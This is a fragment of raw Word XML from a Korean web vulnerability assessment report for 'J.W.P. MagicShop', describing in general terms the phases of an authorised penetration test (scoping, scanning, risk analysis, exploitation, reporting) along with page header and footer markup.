          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>사전</w:t>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 업무 협의 단계</w:t>
      </w:r>
      <w:bookmarkEnd w:id="484"/>
      <w:bookmarkEnd w:id="485"/>
      <w:bookmarkEnd w:id="486"/>
      <w:bookmarkEnd w:id="487"/>
    </w:p>
    <w:p w14:paraId="77B5F853" w14:textId="77777777" w:rsidR="002A6864" w:rsidRPr="00097BC9" w:rsidRDefault="002A6864" w:rsidP="002A6864">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:leftChars="354" w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>취약점진단</w:t>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:t xml:space="preserve"> 대상에 대해 담당자와 협의하여 취약점진단 시나리오 선정, 취약점진단 대상, 기간을 선정하는 단계입니다. 이 단계에서 취약점진단 수행 시 유의사항 및 장애 대응방안에 대한 것을 설명을 드리고 취약점진단 수행계획서를 작성합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B048DC1" w14:textId="77777777" w:rsidR="002A6864" w:rsidRPr="00097BC9" w:rsidRDefault="002A6864" w:rsidP="002A6864">
      <w:pPr>
        <w:ind w:leftChars="354" w:left="708" w:firstLine="1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">(2) </w:t>
      </w:r>
      <w:bookmarkStart w:id="488" w:name="_Toc479668192"/>
      <w:bookmarkStart w:id="489" w:name="_Toc479668235"/>
      <w:bookmarkStart w:id="490" w:name="_Toc479668434"/>
      <w:bookmarkStart w:id="491" w:name="_Toc479669588"/>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>정보</w:t>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 수집 단계</w:t>
      </w:r>
      <w:bookmarkEnd w:id="488"/>
      <w:bookmarkEnd w:id="489"/>
      <w:bookmarkEnd w:id="490"/>
      <w:bookmarkEnd w:id="491"/>
    </w:p>
    <w:p w14:paraId="18BED37F" w14:textId="77777777" w:rsidR="002A6864" w:rsidRPr="00097BC9" w:rsidRDefault="002A6864" w:rsidP="002A6864">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:leftChars="354" w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>취약점진단</w:t>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:t xml:space="preserve"> 대상에 대해 정보를 수집하는 단계로 기업의 전산시스템이 속한 네트워크 구간에 대한 정보 수집을 통해서 사용하고 있는 IP 대역을 조사하며, 수집된 대상 IP구역 내 시스템에 대해서 포트스캔, 웹 취약점 스캔, 네트워크 스캔 등을 수행하여 공격을 위한 정보를 수집합니다. 이 단계에서 자동화된 스캐닝 툴을 이용하기 때문에 장애가 발생하지 않도록 사전에 고객 측 담당자와 긴밀이 협조하여 진행합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC47352" w14:textId="77777777" w:rsidR="002A6864" w:rsidRPr="00097BC9" w:rsidRDefault="002A6864" w:rsidP="002A6864">
      <w:pPr>
        <w:ind w:leftChars="354" w:left="708"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">(3) </w:t>
      </w:r>
      <w:bookmarkStart w:id="492" w:name="_Toc479668193"/>
      <w:bookmarkStart w:id="493" w:name="_Toc479668236"/>
      <w:bookmarkStart w:id="494" w:name="_Toc479668435"/>
      <w:bookmarkStart w:id="495" w:name="_Toc479669589"/>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>취약점</w:t>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 분석 단계</w:t>
      </w:r>
      <w:bookmarkEnd w:id="492"/>
      <w:bookmarkEnd w:id="493"/>
      <w:bookmarkEnd w:id="494"/>
      <w:bookmarkEnd w:id="495"/>
    </w:p>
    <w:p w14:paraId="6A88F5DD" w14:textId="77777777" w:rsidR="002A6864" w:rsidRPr="00097BC9" w:rsidRDefault="002A6864" w:rsidP="002A6864">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:leftChars="354" w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>정보수집단계에서</w:t>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:t xml:space="preserve"> 수집된 정보를 기반으로 하여 대상 시스템에 대한 취약점을 분석합니다. 이 단계에서 High Risk, Middle Risk, Low Risk를 내부적으로 분류하여 이 중 High Risk 부분을 중점적으로 공격을 진행합니다. 취약점진단 성격상 내부 망에 침투하여 대상 전산 시스템의 중요한 기밀 정보를 추출할 수 있는 가능성 여부를 확인하는 단계이기 때문에 Low Risk와 같은 취약점보다 High Risk 취약점을 중점으로 분석을 진행합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234D20D7" w14:textId="77777777" w:rsidR="002A6864" w:rsidRPr="00097BC9" w:rsidRDefault="002A6864" w:rsidP="002A6864">
      <w:pPr>
        <w:ind w:leftChars="354" w:left="708"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">(4) </w:t>
      </w:r>
      <w:bookmarkStart w:id="496" w:name="_Toc479668194"/>
      <w:bookmarkStart w:id="497" w:name="_Toc479668237"/>
      <w:bookmarkStart w:id="498" w:name="_Toc479668436"/>
      <w:bookmarkStart w:id="499" w:name="_Toc479669590"/>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Exploit 단계</w:t>
      </w:r>
      <w:bookmarkEnd w:id="496"/>
      <w:bookmarkEnd w:id="497"/>
      <w:bookmarkEnd w:id="498"/>
      <w:bookmarkEnd w:id="499"/>
    </w:p>
    <w:p w14:paraId="60F18DC1" w14:textId="77777777" w:rsidR="002A6864" w:rsidRPr="00097BC9" w:rsidRDefault="002A6864" w:rsidP="002A6864">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:leftChars="354" w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>취약점</w:t>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:t xml:space="preserve"> 분석단계에서 정리된 Risk Level별 취약점 항목에 대해서 실제 시스템에 공격을 진행하는 단계입니다. 이 단계에서 웹 해킹, 시스템 해킹, 네트워크 해킹을 수행하게 되며 웹 서버의 권한 획득, 시스템 권한획득을 시도합니다. 다양한 공격을 통해 내부 망에 중요한 정보나 중요 DB시스템에 접속하여 Top Secret를 추출하면 미션을 종료합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD8010D" w14:textId="77777777" w:rsidR="002A6864" w:rsidRPr="00097BC9" w:rsidRDefault="002A6864" w:rsidP="002A6864">
      <w:pPr>
        <w:ind w:leftChars="354" w:left="708"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="500" w:name="_Toc479668195"/>
      <w:bookmarkStart w:id="501" w:name="_Toc479668238"/>
      <w:bookmarkStart w:id="502" w:name="_Toc479668437"/>
      <w:bookmarkStart w:id="503" w:name="_Toc479669591"/>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>(5) 보고서</w:t>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 작성 및 프로젝트 종료 단계</w:t>
      </w:r>
      <w:bookmarkEnd w:id="500"/>
      <w:bookmarkEnd w:id="501"/>
      <w:bookmarkEnd w:id="502"/>
      <w:bookmarkEnd w:id="503"/>
    </w:p>
    <w:p w14:paraId="52AD24B1" w14:textId="77777777" w:rsidR="002A6864" w:rsidRPr="00097BC9" w:rsidRDefault="002A6864" w:rsidP="002A6864">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:leftChars="354" w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>취약점진단</w:t>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:t xml:space="preserve"> 진행 시 발견된 취약점과 위협에 대한 설명과 그에 대한 보안대책을 제시하기 위해 보고서를 작성하는 단계입니다. 최종적으로 작성된 보고서는 고객에게 전달합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57657364" w14:textId="77777777" w:rsidR="002A6864" w:rsidRPr="00097BC9" w:rsidRDefault="002A6864" w:rsidP="002A6864">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A089C0A" w14:textId="77777777" w:rsidR="002A6864" w:rsidRPr="00097BC9" w:rsidRDefault="002A6864" w:rsidP="002A6864">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="504" w:name="_Toc479668196"/>
      <w:bookmarkStart w:id="505" w:name="_Toc479668239"/>
      <w:bookmarkStart w:id="506" w:name="_Toc479668438"/>
      <w:bookmarkStart w:id="507" w:name="_Toc479669592"/>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>기타 수행 방법</w:t>
      </w:r>
      <w:bookmarkEnd w:id="504"/>
      <w:bookmarkEnd w:id="505"/>
      <w:bookmarkEnd w:id="506"/>
      <w:bookmarkEnd w:id="507"/>
    </w:p>
    <w:p w14:paraId="67572E3B" w14:textId="144CDE06" w:rsidR="002A6864" w:rsidRPr="00097BC9" w:rsidRDefault="002A6864" w:rsidP="002A6864">
      <w:pPr>
        <w:wordWrap/>
        <w:spacing w:after="240"/>
        <w:ind w:leftChars="350" w:left="700"/>
      </w:pPr>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>대상</w:t>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:t xml:space="preserve"> 시스템의 서비스에 영향을 주는 테스트(예:Dos 공격</w:t>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>, 보안 정책이 적용된 보안 장비의 파라미터 및 히든 필드 조작 적용</w:t>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:t>)는 안전을 위하여 테스트 항목에서</w:t>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00097BC9">
        <w:t>제외하였으며, 대상 시스템의 서비스에 장애 발생 시에는 비상연락망을 통하여 긴급조치를 취하여 복구될 수 있도록 합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CB71AD" w14:textId="48840155" w:rsidR="00F57788" w:rsidRDefault="00F57788" w:rsidP="00097BC9">
      <w:pPr>
        <w:pStyle w:val="Level3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="993"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F57788" w:rsidSect="00097BC9">
      <w:headerReference w:type="default" r:id="rId99"/>
      <w:footerReference w:type="default" r:id="rId100"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="2126" w:right="1134" w:bottom="567" w:left="1134" w:header="851" w:footer="284" w:gutter="0"/>
      <w:cols w:space="425"/>
      <w:docGrid w:linePitch="360"/>
    </w:sectPr>
  </w:body>
</w:document>
</file>

<file path=word/customizations.xml><?xml version="1.0" encoding="utf-8"?>
<wne:tcg xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
  <wne:keymaps>
    <wne:keymap wne:kcmPrimary="0543">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9B53D" w14:textId="77777777" w:rsidR="002331B1" w:rsidRDefault="002331B1" w:rsidP="005D30D0">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3A98496C" w14:textId="77777777" w:rsidR="002331B1" w:rsidRDefault="002331B1" w:rsidP="005D3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9" w:type="dxa"/>
      <w:jc w:val="center"/>
      <w:tblCellMar>
        <w:left w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
      <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="2552"/>
      <w:gridCol w:w="6245"/>
      <w:gridCol w:w="842"/>
      <w:gridCol w:w="20"/>
    </w:tblGrid>
    <w:tr w:rsidR="00AD774D" w:rsidRPr="00802C8E" w14:paraId="5245595D" w14:textId="77777777" w:rsidTr="0042161F">
      <w:trPr>
        <w:trHeight w:val="70"/>
        <w:jc w:val="center"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="2552" w:type="dxa"/>
          <w:vMerge w:val="restart"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="18C1CC75" w14:textId="5E576C11" w:rsidR="00AD774D" w:rsidRPr="00802C8E" w:rsidRDefault="002F2882" w:rsidP="0042161F">
          <w:pPr>
            <w:pStyle w:val="a3"/>
            <w:rPr>
              <w:sz w:val="8"/>
              <w:szCs w:val="12"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00453BAB">
            <w:rPr>
              <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:sz w:val="60"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AD9B220" wp14:editId="26F3EE34">
                <wp:extent cx="432000" cy="288000"/>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2000" cy="288000"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="6245" w:type="dxa"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="5DCD74C0" w14:textId="77777777" w:rsidR="00AD774D" w:rsidRPr="00802C8E" w:rsidRDefault="00AD774D" w:rsidP="0042161F">
          <w:pPr>
            <w:pStyle w:val="a3"/>
            <w:rPr>
              <w:sz w:val="8"/>
              <w:szCs w:val="12"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="842" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          </w:tcBorders>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="2E04D832" w14:textId="77777777" w:rsidR="00AD774D" w:rsidRPr="00802C8E" w:rsidRDefault="00AD774D" w:rsidP="0042161F">
          <w:pPr>
            <w:pStyle w:val="a3"/>
            <w:rPr>
              <w:sz w:val="8"/>
              <w:szCs w:val="12"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="20" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          </w:tcBorders>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="0AE6C5F7" w14:textId="77777777" w:rsidR="00AD774D" w:rsidRPr="00802C8E" w:rsidRDefault="00AD774D" w:rsidP="0042161F">
          <w:pPr>
            <w:pStyle w:val="a3"/>
            <w:rPr>
              <w:sz w:val="8"/>
              <w:szCs w:val="12"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
    <w:tr w:rsidR="00AD774D" w:rsidRPr="00802C8E" w14:paraId="350693A6" w14:textId="77777777" w:rsidTr="0042161F">
      <w:trPr>
        <w:jc w:val="center"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="2552" w:type="dxa"/>
          <w:vMerge/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="49822D4F" w14:textId="77777777" w:rsidR="00AD774D" w:rsidRPr="000914DD" w:rsidRDefault="00AD774D" w:rsidP="0042161F">
          <w:pPr>
            <w:pStyle w:val="a3"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="6245" w:type="dxa"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="22111873" w14:textId="77777777" w:rsidR="00AD774D" w:rsidRPr="000914DD" w:rsidRDefault="00AD774D" w:rsidP="0042161F">
          <w:pPr>
            <w:pStyle w:val="a3"/>
            <w:jc w:val="right"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="842" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          </w:tcBorders>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="04E3CB13" w14:textId="77777777" w:rsidR="00AD774D" w:rsidRPr="000914DD" w:rsidRDefault="00AD774D" w:rsidP="00DC71C2">
          <w:pPr>
            <w:pStyle w:val="a4"/>
            <w:jc w:val="center"/>
          </w:pPr>
          <w:r w:rsidRPr="000914DD">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="000914DD">
            <w:instrText>PAGE  \* Arabic  \* MERGEFORMAT</w:instrText>
          </w:r>
          <w:r w:rsidRPr="000914DD">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="005D4BE6">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>12</w:t>
          </w:r>
          <w:r w:rsidRPr="000914DD">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r w:rsidRPr="000914DD">
            <w:t xml:space="preserve"> / </w:t>
          </w:r>
          <w:r w:rsidR="0041664A">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="0041664A">
            <w:instrText xml:space="preserve"> NUMPAGES   \* MERGEFORMAT </w:instrText>
          </w:r>
          <w:r w:rsidR="0041664A">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="005D4BE6">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>99</w:t>
          </w:r>
          <w:r w:rsidR="0041664A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="20" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          </w:tcBorders>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="31F23C78" w14:textId="77777777" w:rsidR="00AD774D" w:rsidRPr="000914DD" w:rsidRDefault="00AD774D" w:rsidP="0042161F">
          <w:pPr>
            <w:pStyle w:val="a3"/>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="585B08CA" w14:textId="77777777" w:rsidR="00AD774D" w:rsidRDefault="00AD774D">
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>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20D8D" w14:textId="77777777" w:rsidR="002331B1" w:rsidRDefault="002331B1" w:rsidP="005D30D0">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0B8389BB" w14:textId="77777777" w:rsidR="002331B1" w:rsidRDefault="002331B1" w:rsidP="005D3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593"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819"/>
      <w:gridCol w:w="1701"/>
    </w:tblGrid>
    <w:tr w:rsidR="00AD774D" w:rsidRPr="00DD7C29" w14:paraId="2FECAF66" w14:textId="77777777" w:rsidTr="0042161F">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="4073" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          </w:tcBorders>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="17771B7D" w14:textId="77777777" w:rsidR="00AD774D" w:rsidRPr="00DD7C29" w:rsidRDefault="00AD774D" w:rsidP="0042161F"/>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="4819" w:type="dxa"/>
          <w:tcBorders>
            <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            <w:right w:val="single" w:sz="18" w:space="0" w:color="FF0000"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="4F66539D" w14:textId="77777777" w:rsidR="00AD774D" w:rsidRDefault="00AD774D" w:rsidP="0042161F"/>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1701" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="18" w:space="0" w:color="FF0000"/>
            <w:left w:val="single" w:sz="18" w:space="0" w:color="FF0000"/>
            <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FF0000"/>
            <w:right w:val="single" w:sz="18" w:space="0" w:color="FF0000"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="23A299A2" w14:textId="77777777" w:rsidR="00AD774D" w:rsidRPr="00C910CD" w:rsidRDefault="00AD774D" w:rsidP="0042161F">
          <w:pPr>
            <w:rPr>
              <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="2611A3D7" w14:textId="77777777" w:rsidR="00AD774D" w:rsidRDefault="00AD774D" w:rsidP="0042161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013"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8"/>
      <w:gridCol w:w="1240"/>
      <w:gridCol w:w="3039"/>
      <w:gridCol w:w="1736"/>
    </w:tblGrid>
    <w:tr w:rsidR="00AD774D" w:rsidRPr="00DD7C29" w14:paraId="64CDB620" w14:textId="77777777" w:rsidTr="001113E3">
      <w:trPr>
        <w:trHeight w:val="272"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3998" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          </w:tcBorders>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="2B97BF07" w14:textId="4464C72B" w:rsidR="00AD774D" w:rsidRPr="001113E3" w:rsidRDefault="001B7F0F" w:rsidP="001113E3">
          <w:pPr>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:t>J.W.P. MagicShop</w:t>
          </w:r>
          <w:r w:rsidR="00AD774D" w:rsidRPr="001113E3">
            <w:rPr>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:t>-</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:t>WEB</w:t>
          </w:r>
          <w:r w:rsidR="00802A7F">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:t>취약점진단</w:t>
          </w:r>
          <w:r w:rsidR="00AD774D" w:rsidRPr="001113E3">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:t>결과보고서</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1240" w:type="dxa"/>
          <w:tcBorders>
            <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          </w:tcBorders>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="77883034" w14:textId="77777777" w:rsidR="00AD774D" w:rsidRPr="00DD7C29" w:rsidRDefault="00AD774D" w:rsidP="001113E3">
          <w:pPr>
            <w:jc w:val="center"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3039" w:type="dxa"/>
          <w:tcBorders>
            <w:left w:val="nil"/>
            <w:right w:val="single" w:sz="18" w:space="0" w:color="FF0000"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="3EAE31BA" w14:textId="77777777" w:rsidR="00AD774D" w:rsidRDefault="00AD774D" w:rsidP="0042161F"/>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1736" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="18" w:space="0" w:color="FF0000"/>
            <w:left w:val="single" w:sz="18" w:space="0" w:color="FF0000"/>
            <w:bottom w:val="single" w:sz="18" w:space="0" w:color="FF0000"/>
            <w:right w:val="single" w:sz="18" w:space="0" w:color="FF0000"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="3BB689B5" w14:textId="77777777" w:rsidR="00AD774D" w:rsidRPr="00181477" w:rsidRDefault="00AD774D" w:rsidP="0042161F">
          <w:pPr>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:b/>
              <w:color w:val="FF0000"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00181477">
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:b/>
              <w:color w:val="FF0000"/>
            </w:rPr>
            <w:t>Confidential</w:t>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="42D0CD81" w14:textId="77777777" w:rsidR="00AD774D" w:rsidRDefault="00AD774D" w:rsidP="0042161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4DA8" w14:textId="77777777" w:rsidR="00AD774D" w:rsidRDefault="00AD774D" w:rsidP="0042161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9634" w:type="dxa"/>
      <w:jc w:val="center"/>
      <w:tblBorders>
        <w:bottom w:val="thickThinSmallGap" w:sz="18" w:space="0" w:color="auto"/>
      </w:tblBorders>
      <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="1701"/>
      <w:gridCol w:w="5949"/>
      <w:gridCol w:w="1984"/>
    </w:tblGrid>
    <w:tr w:rsidR="00AD774D" w:rsidRPr="00035885" w14:paraId="561672F0" w14:textId="77777777" w:rsidTr="00E37961">
      <w:trPr>
        <w:trHeight w:val="369"/>
        <w:jc w:val="center"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1701" w:type="dxa"/>
